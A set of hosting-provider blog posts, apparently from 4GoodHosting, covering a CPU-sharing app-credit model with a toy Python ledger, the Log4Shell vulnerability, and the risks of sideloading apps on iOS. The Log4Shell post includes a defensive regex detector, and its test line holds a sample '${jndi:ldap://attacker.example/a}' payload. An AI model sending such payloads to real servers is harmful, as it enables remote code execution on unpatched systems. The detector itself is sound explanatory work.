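As a thought experiment, the accounting behind such a model could be as simple as a ledger that converts donated idle CPU time into app credit at some rate. Everything below is invented for illustration; Massive has not published its actual rates or API, and the class and numbers here are hypothetical:

```python
class ComputeCredit:
    """Toy ledger converting donated idle CPU-seconds into app credit.
    The rate is an invented figure, not Massive's real pricing."""

    def __init__(self, credit_per_cpu_hour=0.02, opted_in=False):
        self.rate = credit_per_cpu_hour
        self.opted_in = opted_in
        self.cpu_seconds = 0.0

    def contribute(self, seconds):
        # Consent-gated, mirroring the opt-in model Massive promises
        if not self.opted_in:
            raise PermissionError("user has not opted in")
        self.cpu_seconds += seconds

    def balance(self):
        return self.cpu_seconds / 3600 * self.rate

ledger = ComputeCredit(opted_in=True)
ledger.contribute(5 * 3600)  # five idle hours donated
print(f"${ledger.balance():.2f} of app credit")
```

The real system would of course meter actual work performed rather than wall-clock time, but the basic shape – opt-in gate, metered contribution, credit balance – is the exchange the article describes.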

Some might say this sounds a little invasive because space and power on a personal device are being utilized, and it may seem so to those who aren’t familiar with distributed computing. However, Massive is adamant that it will be putting a priority on security and digital consent, with promises on its website that users will need to opt into the model to participate, plus be able to opt out at any time.

They’re also very upfront about their wish to be part of dismantling the internet’s reliance on nosy marketing practices. The idea is that this new arrangement will reduce the amount of personal information users unwittingly give away, and antivirus protections are going to be thoroughly incorporated into Massive’s CPU-sharing software.

They are working with third-party partners to bring this model to customers, but as of now Massive is only compatible with desktop apps. Plans are in the works to bring this opportunity to mobile, although that may be a good ways down the road. Currently more than 50,000 computer users have already opted in, and that’s a very strong reflection of the high level of interest there’s going to be from people who like the idea of ‘bartering’, in a way, for their apps and services.

New Log4Shell Open-Source Apache Software Vulnerability a Major Problem

It has certainly been a while since we’ve had a nasty bug making enough of a stink to warrant being the subject of one of our weekly blog posts, but here we are again. The good thing has always been that these software vulnerabilities are usually quite limited in the scope of what they’re capable of, which means they usually don’t get much fanfare and are also usually fairly easily dealt with via patches and the like.

The problem comes when the bug is rooted in software that is ubiquitous in cloud servers and in enterprise software used as much by government as by industry. That’s the scenario with the new Log4Shell software vulnerability that has the Internet ‘on fire’, according to those who are qualified to determine whether something is on fire or not. All joking aside, this is apparently a critical vulnerability in a widely used software tool, and – interestingly enough – one that was quickly exploited in Minecraft.

But now it is emerging as a serious threat to organizations around the world, and here at 4GoodHosting, like most quality Canadian web hosting providers, we like to keep our people in the know when it comes to anything so far-reaching that it might apply to a good number of them.

Quick to be Weaponized

Cybersecurity firm Crowdstrike is as good as any for staying well on top of these things, and what they have to say about Log4Shell is that within 12 hours of the bug announcing itself it had been fully weaponized, meaning tools had already been developed and distributed for the purpose of exploiting it. Apparently all sorts of people are scrambling to patch, but just as many are scrambling to exploit.

It’s believed this software flaw may be the worst computer vulnerability to come along in years. As hinted at, it was discovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. If allowed to continue unchecked, it has the potential to give criminals, spies, and programming novices alike no-hassle access to internal networks.

Once in, they can loot valuable data, plant malware, wipe out crucial information, or do a whole lot of other types of damage. And it seems that many different kinds of companies could be at risk because their servers have this utility installed, and we’re still in the early stages of the fallout.

Cybersecurity firm Tenable goes one step further in describing it as ‘the single biggest, most critical vulnerability of the last decade’ and maybe even the biggest one in the history of modern computing.

10 / 10 Cause for Alarm

We also have Log4Shell being given a 10 on a scale of 1 to 10 for cause for alarm by the Apache Software Foundation, which oversees development of the software. The problem is that anyone with the exploit can obtain full access to an unpatched computer that uses the software, and the extreme ease with which an attacker can access a web server through the vulnerability, without a password, is specifically what makes it such a major threat.
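The attack itself rides on a tiny string: if a vulnerable Log4j instance logs attacker-controlled text containing a `${jndi:...}` lookup, it can be made to fetch and execute remote code. The only real fix is patching Log4j, but as a rough illustration of what scanners check incoming text for, a naive detector of the telltale prefix might look like this (a simple sketch, not a substitute for patching, and it won’t catch the obfuscated nested variants seen in the wild):

```python
import re

# Matches the basic ${jndi:...} lookup form. Real-world payloads use
# nested/obfuscated variants (e.g. ${${lower:j}ndi:...}) that evade
# a simple pattern like this one.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def looks_like_log4shell(text: str) -> bool:
    """Return True if the text contains the telltale JNDI lookup prefix."""
    return bool(JNDI_PATTERN.search(text))

print(looks_like_log4shell("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("normal User-Agent string"))           # False
```

The fact that the trigger can hide in any logged field – a chat message, a User-Agent header, a username – is exactly why the ease of exploitation was rated so severely.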

A computer emergency response team in New Zealand was the first to report the flaw being actively exploited in the wild, just hours after the first patch was released in response to it. This was weeks ago now, and the hugely popular online game Minecraft was where the first obvious signs of the flaw’s exploitation were seen; the fact the game is owned by Microsoft shouldn’t be overlooked.

It’s been reported that Minecraft users were already using it to execute programs on the computers of other users by pasting a short message into a chat box. A software update for game users followed shortly after, and customers who apply the fix are protected. But the ‘fire’ isn’t contained by any means – researchers reported finding evidence the vulnerability may also be exploited in servers operated by companies like Apple, Amazon, Twitter and Cloudflare.

The Case Against Sideloading Apps onto iOS

Android and iOS are definitely two entirely different worlds when it comes to the default choices between mobile devices, and you’d have trouble finding more than just a few people who don’t take advantage of apps for their smartphones nowadays. Depending on who you are, that may be for entertainment or personal pursuits, or it may be for making your workdays that much more productive and streamlined. There are all sorts of possibilities for what you can do with apps, and it sure is a whole lot different from where we were just 10 or so years ago.

Once you’ve got a taste for them it’s hard to go back, and you won’t want to be thwarted in your attempts to get one onto your device if you see the need for it. The reason that sideloading apps – installing apps without getting them from official sources (namely Android Market or the App Store) – is as popular as it is, is because both Google and Apple have been fairly free with allowing certain carriers to block certain applications based on model and network. There are plenty of people with phones only a couple of years old that are already encountering roadblocks, and sideloading the app allows them to get around that.

In the bigger picture though it’s not good for the development of better app versions in the future, as those developers don’t get what they should for their work and that’s something we can relate to in a roundabout way as a good Canadian web hosting provider. We certainly know all that goes into allowing people to enjoy the digital connectivity they do nowadays.

So not to pick sides, but recent information seems to suggest that sideloading apps for Android is not so bad as it might be for iOS devices. Let’s look at why that is.

Privacy & Security Concerns

Apple has come right out and made it clear there’s plenty of evidence indicating that sideloading apps through direct downloads and third-party app stores would weaken the privacy and security protections that have made the iPhone as secure as it’s been regarded to be all these years. They’ve even sent a letter to US lawmakers raising similar concerns about legislation that would require app store competition and mandate support for sideloading.

The focus here is on apps sideloaded by users onto a device without the involvement of a trusted intermediary performing at least some oversight function. It is true that downloading an iOS app from a website and installing it isn’t the same as downloading one from an app store operated by Google or Microsoft. Whether a third-party app store might offer better security and privacy than the official app stores is a legitimate question.

A lot of the concern is based around the fact that Apple only spends an average of 12 minutes or so reviewing each iOS app. Apps offered outside the iOS App Store may be backed by a more detailed app review, and be better about disallowing third-party analytics and ad SDKs. Long story short, apps that cost more elsewhere might be worth it after all, but generally you’re not going to find versions like that available for sideloading anyway.

Android Difference

Part of why Apple disapproves of sideloading is framed as user interest, as it believes Android has poor security because it supports sideloading. It is true that a survey found Android devices have 15 to 47 times more malware infections than iPhone, so there is some truth to this, although the size of the user base has to be taken into consideration too.

To be fair, though, Apple does not put out a Transparency Report the way Google does for Android. Security issues may be more visible on Android than iOS, but that is a reality of iOS being less accessible to researchers. According to the most recent version of that report, only about 0.075% of Android devices running Android 11 during Q2 2021 had a PHA (potentially harmful application), and that includes devices that sideloaded apps.

It does need to be said, though, that security issues on Android are partly a reflection of Google’s inability to force operating system upgrades on devices sold by other vendors. As a result, older Android versions with vulnerabilities hang around the market longer. That’s a consequence of Android’s multi-vendor ecosystem rather than the perils of sideloading.

The Case

These are the risks a person could assume if they sideload apps onto an iOS device:
  • Greater numbers of harmful apps reaching users due to the ease with which cybercriminals can target them this way, especially including sideloads limited to third-party app stores.
  • Users having less up-front information about the apps with which to make informed decisions about whether or not to add them to the device, and less control over those apps once they’re on the device.
  • Protections against third-party access to proprietary hardware elements may be removed, and non-public operating system functions may be distorted or misaligned.
  • Sideloaded apps needed for work or school may put users at a direct disadvantage.

Other Considerations

Another thing to keep in mind is that sideloading does increase the attack surface of iOS, at least to some extent, although to be fair the App Store has had more than a few scam-geared and insecure apps itself over the years. The security afforded by iOS is a legitimate benefit, largely due to security features built into the operating system, like app sandboxing, memory safety, permission prompts, and others.

It is also always advisable to look for reviews of any app you’re thinking of sideloading. External sites are often best for doing this, as reviews in third-party app sources may not be genuine, and the frequency of planted app reviews is well established. Proceed with caution, as with everything else.